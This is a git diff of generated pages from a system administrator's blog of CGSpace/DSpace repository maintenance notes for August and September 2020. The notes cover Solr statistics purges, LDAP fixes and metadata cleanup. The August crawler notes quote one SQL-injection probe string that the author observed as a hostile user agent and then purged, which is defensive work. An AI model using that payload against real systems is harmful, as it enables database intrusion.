+<li>Linode keeps sending mails that the load and outgoing bandwidth is above the threshold
+<ul>
+<li>I took a look briefly and found two IPs with the &ldquo;Delphi 2009&rdquo; user agent</li>
+<li>Then there is 88.99.115.53 which made 82,000 requests in 2020 so far with no user agent</li>
+<li>64.62.202.73 has made 7,000 requests with this user agent <code>Mozilla/5.0 (compatible; +centuryb.o.t9[at]gmail.com)</code></li>
+<li>I had added it to the Tomcat Crawler Session Manager Valve last week but never purged the hits from Solr</li>
+<li>195.54.160.163 is making thousands of requests with user agents liket this:</li>
+</ul>
+</li>
+</ul>
+<p><code>(CASE WHEN 2850=9474 THEN 2850 ELSE NULL END)</code></p>
+<ul>
+<li>I purged 150,000 hits from 2020 and 2020 from these user agents and hosts</li>
+</ul>
+<h2 id="2020-08-14">2020-08-14</h2>
+<ul>
+<li>Last night I started the processing of the statistics-2016 core with the Atmire stats util and I see some errors like this:</li>
+</ul>
+<pre tabindex="0"><code>Record uid: f6b288d7-d60d-4df9-b311-1696b88552a0 couldn&#39;t be processed
+com.atmire.statistics.util.update.atomic.ProcessingException: something went wrong while processing record uid: f6b288d7-d60d-4df9-b311-1696b88552a0, an error occured in the com.atmire.statistics.util.update.atomic.processor.ContainerOwnerDBProcessor
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.applyProcessors(SourceFile:304)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.processRecords(SourceFile:176)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.performRun(SourceFile:161)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.update(SourceFile:128)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI.main(SourceFile:78)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+Caused by: java.lang.NullPointerException
+</code></pre><ul>
+<li>I see it has <code>id: 980-unmigrated</code> and <code>type: 0</code>&hellip;</li>
+<li>The 2016 core has 629,983 unmigrated docs, mostly:
+<ul>
+<li><code>type: 5</code>: 620311</li>
+<li><code>type: 0</code>: 7255</li>
+<li><code>type: 3</code>: 1333</li>
+</ul>
+</li>
+<li>I purged the unmigrated docs and continued processing:</li>
+</ul>
+<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics-2016/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;id:/.*unmigrated.*/&lt;/query&gt;&lt;/delete&gt;&#39;
+$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx2048m&#39;
+$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics-2016
+</code></pre><ul>
+<li>Altmetric asked for a dump of CGSpace&rsquo;s OAI &ldquo;sets&rdquo; so they can update their affiliation mappings
+<ul>
+<li>I did it in a kinda ghetto way:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ http &#39;https://cgspace.cgiar.org/oai/request?verb=ListSets&#39; &gt; /tmp/0.xml
+$ for num in {100..1300..100}; do http &#34;https://cgspace.cgiar.org/oai/request?verb=ListSets&amp;resumptionToken=////$num&#34; &gt; /tmp/$num.xml; sleep 2; done
+$ for num in {0..1300..100}; do cat /tmp/$num.xml &gt;&gt; /tmp/cgspace-oai-sets.xml; done
+</code></pre><ul>
+<li>This produces one file that has all the sets, albeit with 14 pages of responses concatenated into one document, but that&rsquo;s how theirs was in the first place&hellip;</li>
+<li>Help Bizu with a restricted item for CIAT</li>
+</ul>
+<h2 id="2020-08-16">2020-08-16</h2>
+<ul>
+<li>The com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI script that was processing 2015 records last night started spitting shit tons of errors and created 120GB of logs&hellip;</li>
+<li>I looked at a few of the UIDs that it was having problems with and they were unmigrated ones&hellip; so I purged them in 2015 and all the rest of the statistics cores</li>
+</ul>
+<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics-2015/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;id:/.*unmigrated.*/&lt;/query&gt;&lt;/delete&gt;&#39;
+...
+$ curl -s &#34;http://localhost:8081/solr/statistics-2010/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;id:/.*unmigrated.*/&lt;/query&gt;&lt;/delete&gt;&#39;
+</code></pre><h2 id="2020-08-19">2020-08-19</h2>
+<ul>
+<li>I tested the DSpace 5 and DSpace 6 versions of the <a href="https://github.com/ilri/cgspace-java-helpers">country code tagger curation task</a> and noticed a few things
+<ul>
+<li>The DSpace 5.8 version finishes in 2 hours and 1 minute</li>
+<li>The DSpace 6.3 version ran for over 12 hours and didn&rsquo;t even finish (I killed it)</li>
+<li>Furthermore, it seems that each item is curated once for each collection it appears in, causing about 115,000 items to be processed, even though we only have about 87,000</li>
+</ul>
+</li>
+<li>I had been running the tasks on the entire repository with <code>-i 10568/0</code>, but I think I might need to try again with the special <code>all</code> option before writing to the dspace-tech mailing list for help
+<ul>
+<li>Actually I just tested the <code>all</code> option on DSpace 5.8 and it still does many of the items multiple times, once for each of their mappings</li>
+<li>I sent a message to the dspace-tech mailing list</li>
+</ul>
+</li>
+<li>I finished the Atmire stats processing on all cores on DSpace Test:
+<ul>
+<li>statistics:
+<ul>
+<li>2,040,385 docs: 2h 28m 49s</li>
+</ul>
+</li>
+<li>statistics-2019:
+<ul>
+<li>8,960,000 docs: 12h 7s</li>
+<li>1,780,575 docs: 2h 7m 29s</li>
+</ul>
+</li>
+<li>statistics-2018:
+<ul>
+<li>2,200,000 docs: 12h 1m 11s</li>
+<li>2,100,000 docs: 12h 4m 19s</li>
+<li>?</li>
+</ul>
+</li>
+<li>statistics-2017:
+<ul>
+<li>1,970,000 docs: 12h 5m 45s</li>
+<li>2,000,000 docs: 12h 5m 38s</li>
+<li>1,312,674 docs: 4h 14m 23s</li>
+</ul>
+</li>
+<li>statistics-2016:
+<ul>
+<li>1,669,020 docs: 12h 4m 3s</li>
+<li>1,650,000 docs: 12h 7m 40s</li>
+<li>850,611 docs: 44m 52s</li>
+</ul>
+</li>
+<li>statistics-2014:
+<ul>
+<li>4,832,334 docs: 3h 53m 41s</li>
+</ul>
+</li>
+<li>statistics-2013:
+<ul>
+<li>4,509,891 docs: 3h 18m 44s</li>
+</ul>
+</li>
+<li>statistics-2012:
+<ul>
+<li>3,716,857 docs: 2h 36m 21s</li>
+</ul>
+</li>
+<li>statistics-2011:
+<ul>
+<li>1,645,426 docs: 1h 11m 41s</li>
+</ul>
+</li>
+</ul>
+</li>
+<li>As far as I can tell, the processing became much faster once I purged all the unmigrated records
+<ul>
+<li>It took about six days for the processing according to the times above, though 2015 is missing&hellip; hmm</li>
+</ul>
+</li>
+<li>Now I am testing the Atmire Listings and Reports
+<ul>
+<li>On both my local test and DSpace Test I get no results when searching for &ldquo;Orth, A.&rdquo; and &ldquo;Orth, Alan&rdquo; or even Delia Grace, but the Discovery index is up to date and I have eighteen items&hellip;</li>
+<li>I sent a message to Atmire&hellip;</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-08-20">2020-08-20</h2>
+<ul>
+<li>Natalia from CIAT was asking how she can download all the PDFs for the items in a search result
+<ul>
+<li>The search result is for the keyword &ldquo;trade off&rdquo; in the WLE community</li>
+<li>I converted the Discovery search to an open-search query to extract the XML, but we can&rsquo;t get all the results on one page so I had to change the <code>rpp</code> to 100 and request a few times to get them all:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ http &#39;https://cgspace.cgiar.org/open-search/discover?scope=10568%2F34494&amp;query=trade+off&amp;rpp=100&amp;start=0&#39; User-Agent:&#39;curl&#39; &gt; /tmp/wle-trade-off-page1.xml
+$ http &#39;https://cgspace.cgiar.org/open-search/discover?scope=10568%2F34494&amp;query=trade+off&amp;rpp=100&amp;start=100&#39; User-Agent:&#39;curl&#39; &gt; /tmp/wle-trade-off-page2.xml
+$ http &#39;https://cgspace.cgiar.org/open-search/discover?scope=10568%2F34494&amp;query=trade+off&amp;rpp=100&amp;start=200&#39; User-Agent:&#39;curl&#39; &gt; /tmp/wle-trade-off-page3.xml
+</code></pre><ul>
+<li>Ugh, and to extract the <code>&lt;id&gt;</code> from each <code>&lt;entry&gt;</code> we have to use an XPath query, but use a <a href="http://blog.powered-up-games.com/wordpress/archives/70">hack to ignore the default namespace by setting each element&rsquo;s local name</a>:</li>
+</ul>
+<pre tabindex="0"><code>$ xmllint --xpath &#39;//*[local-name()=&#34;entry&#34;]/*[local-name()=&#34;id&#34;]/text()&#39; /tmp/wle-trade-off-page1.xml &gt;&gt; /tmp/ids.txt
+$ xmllint --xpath &#39;//*[local-name()=&#34;entry&#34;]/*[local-name()=&#34;id&#34;]/text()&#39; /tmp/wle-trade-off-page2.xml &gt;&gt; /tmp/ids.txt
+$ xmllint --xpath &#39;//*[local-name()=&#34;entry&#34;]/*[local-name()=&#34;id&#34;]/text()&#39; /tmp/wle-trade-off-page3.xml &gt;&gt; /tmp/ids.txt
+$ sort -u /tmp/ids.txt &gt; /tmp/ids-sorted.txt
+$ grep -oE &#39;[0-9]+/[0-9]+&#39; /tmp/ids.txt &gt; /tmp/handles.txt
+</code></pre><ul>
+<li>Now I have all the handles for the matching items and I can use the REST API to get each item&rsquo;s PDFs&hellip;
+<ul>
+<li>I wrote <code>get-wle-pdfs.py</code> to read the handles from a text file and get all PDFs: <a href="https://github.com/ilri/DSpace/blob/5_x-prod/get-wle-pdfs.py">https://github.com/ilri/DSpace/blob/5_x-prod/get-wle-pdfs.py</a></li>
+</ul>
+</li>
+<li>Add <code>Foreign, Commonwealth and Development Office, United Kingdom</code> to the controlled vocabulary for sponsors on CGSpace
+<ul>
+<li>This is the new name for DFID as of 2020-09-01</li>
+<li>We will continue using DFID for older items</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-08-22">2020-08-22</h2>
+<ul>
+<li>Peter noticed that the AReS data was out dated, and I see in the admin dashboard that it hasn&rsquo;t been updated since 2020-07-21
+<ul>
+<li>I initiated a re-indexing and I see from the CGSpace logs that it is indeed running</li>
+</ul>
+</li>
+<li>Margarita from CCAFS asked for help adding a new user to their submission and approvers groups
+<ul>
+<li>I told them to log in using the LDAP login first so that the e-person gets created</li>
+</ul>
+</li>
+<li>I manually renamed a few dozen of the stupid &ldquo;a-ILRI submitters&rdquo; groups that had the &ldquo;a-&rdquo; prefix on CGSpace
+<ul>
+<li>For what it&rsquo;s worth, we had asked Sisay to do this over a year ago and he never did</li>
+<li>Also, we have two CCAFS approvers groups: <code>CCAFS approvers</code> and <code>CCAFS approvers1</code>, with each added to about half of the CCAFS collections</li>
+<li>The group members are the same so I went through and replaced the <code>CCAFS approvers1</code> group everywhere manually&hellip;</li>
+<li>I also removed some old CCAFS users from the groups</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-08-27">2020-08-27</h2>
+<ul>
+<li>I ran the CountryCodeTagger on CGSpace and it was very fast:</li>
+</ul>
+<pre tabindex="0"><code>$ time chrt -b 0 dspace curate -t countrycodetagger -i all -r - -l 500 -s object | tee /tmp/2020-08-27-countrycodetagger.log
+real    2m7.643s
+user    1m48.740s
+sys     0m14.518s
+$ grep -c added /tmp/2020-08-27-countrycodetagger.log
+46
+</code></pre><ul>
+<li>I still haven&rsquo;t created a cron job for it&hellip; but it&rsquo;s good to know that when it doesn&rsquo;t need to add very many country codes that it is very fast (original run a few weeks ago added 50,000 country codes)
+<ul>
+<li>I wonder how DSpace 6 will perform when it doesn&rsquo;t need to add all the codes, like after the initial run</li>
+</ul>
+</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2020-09/index.html b/docs/2020-09/index.html
new file mode 100644
index 000000000..e2a93d36d
--- /dev/null
+++ b/docs/2020-09/index.html
@@ -0,0 +1,771 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="September, 2020" />
+<meta property="og:description" content="2020-09-02
+
+Replace Marissa van Epp for Rhys Bucknall in the CCAFS groups on CGSpace because Marissa no longer works at CCAFS
+The AReS Explorer hasn&rsquo;t updated its index since 2020-08-22 when I last forced it
+
+I restarted it again now and told Moayad that the automatic indexing isn&rsquo;t working
+
+
+Add Alliance of Bioversity International and CIAT to affiliations on CGSpace
+Abenet told me that the general search text on AReS doesn&rsquo;t get reset when you use the &ldquo;Reset Filters&rdquo; button
+
+I filed a bug on OpenRXV: https://github.com/ilri/OpenRXV/issues/39
+
+
+I filed an issue on OpenRXV to make some minor edits to the admin UI: https://github.com/ilri/OpenRXV/issues/40
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2020-09/" />
+<meta property="article:published_time" content="2020-09-02T15:35:54+03:00" />
+<meta property="article:modified_time" content="2020-10-01T10:47:40+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="September, 2020"/>
+<meta name="twitter:description" content="2020-09-02
+
+Replace Marissa van Epp for Rhys Bucknall in the CCAFS groups on CGSpace because Marissa no longer works at CCAFS
+The AReS Explorer hasn&rsquo;t updated its index since 2020-08-22 when I last forced it
+
+I restarted it again now and told Moayad that the automatic indexing isn&rsquo;t working
+
+
+Add Alliance of Bioversity International and CIAT to affiliations on CGSpace
+Abenet told me that the general search text on AReS doesn&rsquo;t get reset when you use the &ldquo;Reset Filters&rdquo; button
+
+I filed a bug on OpenRXV: https://github.com/ilri/OpenRXV/issues/39
+
+
+I filed an issue on OpenRXV to make some minor edits to the admin UI: https://github.com/ilri/OpenRXV/issues/40
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "September, 2020",
+  "url": "https://alanorth.github.io/cgspace-notes/2020-09/",
+  "wordCount": "2970",
+  "datePublished": "2020-09-02T15:35:54+03:00",
+  "dateModified": "2020-10-01T10:47:40+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2020-09/">
+
+    <title>September, 2020 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-09/">September, 2020</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2020-09-02T15:35:54+03:00">Wed Sep 02, 2020</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-09-02">2020-09-02</h2>
+<ul>
+<li>Replace Marissa van Epp for Rhys Bucknall in the CCAFS groups on CGSpace because Marissa no longer works at CCAFS</li>
+<li>The AReS Explorer hasn&rsquo;t updated its index since 2020-08-22 when I last forced it
+<ul>
+<li>I restarted it again now and told Moayad that the automatic indexing isn&rsquo;t working</li>
+</ul>
+</li>
+<li>Add <code>Alliance of Bioversity International and CIAT</code> to affiliations on CGSpace</li>
+<li>Abenet told me that the general search text on AReS doesn&rsquo;t get reset when you use the &ldquo;Reset Filters&rdquo; button
+<ul>
+<li>I filed a bug on OpenRXV: <a href="https://github.com/ilri/OpenRXV/issues/39">https://github.com/ilri/OpenRXV/issues/39</a></li>
+</ul>
+</li>
+<li>I filed an issue on OpenRXV to make some minor edits to the admin UI: <a href="https://github.com/ilri/OpenRXV/issues/40">https://github.com/ilri/OpenRXV/issues/40</a></li>
+</ul>
+<ul>
+<li>I ran the country code tagger on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ time chrt -b 0 dspace curate -t countrycodetagger -i all -r - -l 500 -s object | tee /tmp/2020-09-02-countrycodetagger.log
+...
+real    2m10.516s
+user    1m43.953s
+sys     0m15.192s
+$ grep -c added /tmp/2020-09-02-countrycodetagger.log
+39
+</code></pre><ul>
+<li>I still need to create a cron job for this&hellip;</li>
+<li>Sisay and Abenet said they can&rsquo;t log in with LDAP on DSpace Test (DSpace 6)
+<ul>
+<li>I tried and I can&rsquo;t either&hellip; but it is working on CGSpace</li>
+<li>The error on DSpace 6 is:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>2020-09-02 12:03:10,666 INFO  org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=A629116488DCC467E1EA2062A2E2EFD7:ip_addr=92.220.02.201:failed_login:no DN found for user aorth
+</code></pre><ul>
+<li>I tried to query LDAP directly using the application credentials with ldapsearch and it works:</li>
+</ul>
+<pre tabindex="0"><code>$ ldapsearch -x -H ldaps://AZCGNEROOT2.CGIARAD.ORG:636/ -b &#34;dc=cgiarad,dc=org&#34; -D &#34;applicationaccount@cgiarad.org&#34; -W &#34;(sAMAccountName=me)&#34;
+</code></pre><ul>
+<li>According to the <a href="https://wiki.lyrasis.org/display/DSDOC6x/Authentication+Plugins#AuthenticationPlugins-LDAPAuthentication">DSpace 6 docs</a> we need to escape commas in our LDAP parameters due to the new configuration system
+<ul>
+<li>I added the commas and restarted DSpace (though technically we shouldn&rsquo;t need to restart due to the new config system hot reloading configs)</li>
+<li>Run all system updates on DSpace Test (linode26) and reboot it</li>
+<li>After the restart LDAP login works&hellip;</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-09-03">2020-09-03</h2>
+<ul>
+<li>Fix some erroneous &ldquo;review status&rdquo; fields that Abenet noticed on AReS
+<ul>
+<li>I used my <code>fix-metadata-values.py</code> and <code>delete-metadata-values.py</code> scripts with the following input files:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ cat 2020-09-03-fix-review-status.csv
+dc.description.version,correct
+Externally Peer Reviewed,Peer Review
+Peer Reviewed,Peer Review
+Peer review,Peer Review
+Peer reviewed,Peer Review
+Peer-Reviewed,Peer Review
+Peer-reviewed,Peer Review
+peer Review,Peer Review
+$ cat 2020-09-03-delete-review-status.csv
+dc.description.version
+Report
+Formally Published
+Poster
+Unrefereed reprint
+$ ./delete-metadata-values.py -i 2020-09-03-delete-review-status.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.description.version -m 68
+$ ./fix-metadata-values.py -i 2020-09-03-fix-review-status.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.description.version -t &#39;correct&#39; -m 68
+</code></pre><ul>
+<li>Start reviewing 95 items for IITA (20201stbatch)
+<ul>
+<li>I used my <a href="https://github.com/ilri/csv-metadata-quality">csv-metadata-quality</a> tool to check and fix some low-hanging fruit first</li>
+<li>This fixed a few unnecessary Unicode, excessive whitespace, invalid multi-value separator, and duplicate metadata values</li>
+<li>Then I looked at the data in OpenRefine and noticed some things:
+<ul>
+<li>All issue dates use year only, but some have months in the citation so they could be more specific</li>
+<li>I normalized all the DOIs to use &ldquo;<a href="https://doi.org">https://doi.org</a>&rdquo; format</li>
+<li>I fixed a few AGROVOC subjects with a simple GREL: <code>value.replace(&quot;GRAINS&quot;,&quot;GRAIN&quot;).replace(&quot;SOILS&quot;,&quot;SOIL&quot;).replace(&quot;CORN&quot;,&quot;MAIZE&quot;)</code></li>
+<li>But there are a few more that are invalid that she will have to look at</li>
+<li>I uploaded the items to <a href="https://dspacetest.cgiar.org/handle/10568/108357">DSpace Test</a> and it was apparently successful but I get these errors to the console:</li>
+</ul>
+</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>Thu Sep 03 12:26:33 CEST 2020 | Query:containerItem:ea7a2648-180d-4fce-bdc5-c3aa2304fc58
+Error while updating
+java.lang.NullPointerException
+        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl$5.visit(SourceFile:1131)
+        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.visitEachStatisticShard(SourceFile:212)
+        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.update(SourceFile:1104)
+        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.update(SourceFile:1093)
+        at org.dspace.statistics.StatisticsLoggingConsumer.consume(SourceFile:104)
+        at org.dspace.event.BasicDispatcher.consume(BasicDispatcher.java:177)
+        at org.dspace.event.BasicDispatcher.dispatch(BasicDispatcher.java:123)
+        at org.dspace.core.Context.dispatchEvents(Context.java:455)
+        at org.dspace.core.Context.commit(Context.java:424)
+        at org.dspace.core.Context.complete(Context.java:380)
+        at org.dspace.app.bulkedit.MetadataImport.main(MetadataImport.java:1399)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+</code></pre><ul>
+<li>There are more in the DSpace log so I will raise it with Atmire immediately</li>
+</ul>
+<h2 id="2020-09-04">2020-09-04</h2>
+<ul>
+<li>I was checking the recent IITA data for duplicates when I noticed that one in CIFOR&rsquo;s Archive and saw that CIFOR has updated a bunch of their website URLs, for example:
+<ul>
+<li><a href="http://www.cifor.org/nc/online-library/browse/view-publication/publication/151.html">http://www.cifor.org/nc/online-library/browse/view-publication/publication/151.html</a> → <a href="https://www.cifor.org/knowledge/publication/151">https://www.cifor.org/knowledge/publication/151</a></li>
+<li><a href="https://www.cifor.org/library/4033">https://www.cifor.org/library/4033</a> → <a href="https://www.cifor.org/knowledge/publication/4033">https://www.cifor.org/knowledge/publication/4033</a></li>
+<li><a href="https://www.cifor.org/pid/5087">https://www.cifor.org/pid/5087</a> → <a href="https://www.cifor.org/knowledge/publication/5087">https://www.cifor.org/knowledge/publication/5087</a></li>
+</ul>
+</li>
+<li>I will update our nearly 6,000 metadata values for CIFOR in the database accordingly:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;^(http://)?www\.cifor\.org/(nc/)?online-library/browse/view-publication/publication/([[:digit:]]+)\.html$&#39;, &#39;https://www.cifor.org/knowledge/publication/\3&#39;) WHERE metadata_field_id=219 AND text_value ~ &#39;www\.cifor\.org/(nc/)?online-library/browse/view-publication/publication/[[:digit:]]+&#39;;
+dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;^https?://www\.cifor\.org/library/([[:digit:]]+)/?$&#39;, &#39;https://www.cifor.org/knowledge/publication/\1&#39;) WHERE metadata_field_id=219 AND text_value ~ &#39;https?://www\.cifor\.org/library/[[:digit:]]+/?&#39;;
+dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;^https?://www\.cifor\.org/pid/([[:digit:]]+)/?$&#39;, &#39;https://www.cifor.org/knowledge/publication/\1&#39;) WHERE metadata_field_id=219 AND text_value ~ &#39;https?://www\.cifor\.org/pid/[[:digit:]]+&#39;;
+</code></pre><ul>
+<li>I did some cleanup on the author affiliations of the IITA data our 2019-04 list using reconcile-csv and OpenRefine:
+<ul>
+<li><code>$ lein run ~/src/git/DSpace/2019-04-08-affiliations.csv name id</code></li>
+<li>I always forget how to copy the reconciled values in OpenRefine, but you need to make a new column and populate it using this GREL: <code>if(cell.recon.matched, cell.recon.match.name, value)</code></li>
+</ul>
+</li>
+<li>I mapped one duplicated from the CIFOR Archives and re-uploaded the 94 IITA items to a new collection on <a href="https://dspacetest.cgiar.org/handle/10568/108453">DSpace Test</a></li>
+</ul>
+<h2 id="2020-09-08">2020-09-08</h2>
+<ul>
+<li>I noticed that the &ldquo;share&rdquo; link in AReS wasn&rsquo;t working properly because it excludes the &ldquo;explorer&rdquo; part of the URI</li>
+</ul>
+<p><img src="/cgspace-notes/2020/09/ares-share-link.png" alt="AReS share link broken"></p>
+<ul>
+<li>I filed an issue on GitHub: <a href="https://github.com/ilri/OpenRXV/issues/41">https://github.com/ilri/OpenRXV/issues/41</a></li>
+<li>I uploaded the 94 IITA items that I had been working on last week to CGSpace</li>
+<li>RTB emailed to ask why they are getting HTTP 503 errors during harvesting to the RTB WordPress website
+<ul>
+<li>From the screenshot I can see they are requesting URLs like this:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>https://cgspace.cgiar.org/bitstream/handle/10568/82745/Characteristics-Silage.JPG
+</code></pre><ul>
+<li>So they end up getting rate limited due to the XMLUI rate limits
+<ul>
+<li>I told them to use the REST API bitstream retrieve links, because we don&rsquo;t have any rate limits there</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-09-09">2020-09-09</h2>
+<ul>
+<li>Wire up the systemd service/timer for the CGSpace Country Code Tagger curation task in the <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure scripts</a>
+<ul>
+<li><del>For now it won&rsquo;t work on DSpace 6 because the curation task invocation needs to be slightly different (minus the <code>-l</code> parameter) and for some reason the task isn&rsquo;t working on DSpace Test (version 6) right now</del></li>
+<li>I added DSpace 6 support to the playbook templates&hellip;</li>
+</ul>
+</li>
+<li>Run system updates on DSpace Test (linode26), re-deploy the DSpace 6 test branch, and reboot the server
+<ul>
+<li>After rebooting I deleted old copies of the cgspace-java-helpers JAR in the DSpace lib directory and then the curation worked</li>
+<li>To my great surprise the curation worked (and completed, albeit a few times slower) on my local DSpace 6 environment as well:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ ~/dspace63/bin/dspace curate -t countrycodetagger -i all -s object
+</code></pre><h2 id="2020-09-10">2020-09-10</h2>
+<ul>
+<li>I checked the country code tagger on CGSpace and DSpace Test and it ran fine from the systemd timer last night&hellip; w00t</li>
+<li>I started looking at Peter&rsquo;s changes to the CGSpace regions that were proposed in 2020-07
+<ul>
+<li>The changes will be:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ cat 2020-09-10-fix-cgspace-regions.csv
+cg.coverage.region,correct
+EAST AFRICA,EASTERN AFRICA
+WEST AFRICA,WESTERN AFRICA
+SOUTHEAST ASIA,SOUTHEASTERN ASIA
+SOUTH ASIA,SOUTHERN ASIA
+AFRICA SOUTH OF SAHARA,SUB-SAHARAN AFRICA
+NORTH AFRICA,NORTHERN AFRICA
